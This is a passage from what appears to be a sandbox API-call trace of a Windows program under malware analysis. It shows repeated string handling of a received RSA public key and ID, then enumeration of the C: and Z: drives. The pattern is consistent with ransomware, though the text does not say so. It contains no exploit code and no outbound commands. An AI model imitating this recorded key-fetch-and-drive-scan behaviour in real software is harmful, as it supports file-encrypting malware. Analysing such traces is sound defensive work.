KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.807] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d5e8 | out: hHeap=0x620000) returned 1 [0181.808] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.808] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0181.808] lstrcpyA (in: lpString1=0x922ab78, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.808] lstrcpyA (in: lpString1=0x922a778, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.808] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d648 | out: hHeap=0x620000) returned 1 [0181.808] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.808] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0181.808] lstrlenW (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 40 [0181.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c5d8 | out: hHeap=0x620000) returned 1 Thread: id = 181 os_tid = 0x66c [0182.309] timeGetTime () returned 0xd33f [0182.309] GetLastError () returned 0x54f [0182.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x6756a8 [0182.309] GetCurrentThreadId () returned 0x66c [0182.309] SetLastError (dwErrCode=0x54f) [0182.309] Sleep (dwMilliseconds=0x0) [0182.311] Sleep (dwMilliseconds=0x3e8) [0183.313] GetLogicalDrives () returned 0x2000004 [0183.313] SetErrorMode (uMode=0x1) returned 0x0 [0183.314] PathFileExistsA (pszPath="C:\\") returned 1 [0183.314] SetErrorMode (uMode=0x0) returned 0x1 [0183.314] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0183.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e902a8 [0183.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x312fe60, cbMultiByte=-1, lpWideCharStr=0x2e902a8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0183.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85e08 [0183.315] SetErrorMode (uMode=0x1) returned 0x0 [0183.315] PathFileExistsA (pszPath="Z:\\") returned 1 [0183.315] SetErrorMode (uMode=0x0) returned 0x1 [0183.316] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x4 [0183.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e902a8 [0183.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x312fe60, cbMultiByte=-1, lpWideCharStr=0x2e902a8, cchWideChar=1027 | out: lpWideCharStr="Z:\\") returned 4 [0183.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e76e58 [0183.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95a0 [0183.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85e08 | out: hHeap=0x620000) returned 1 [0183.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.317] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e902a8 [0183.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 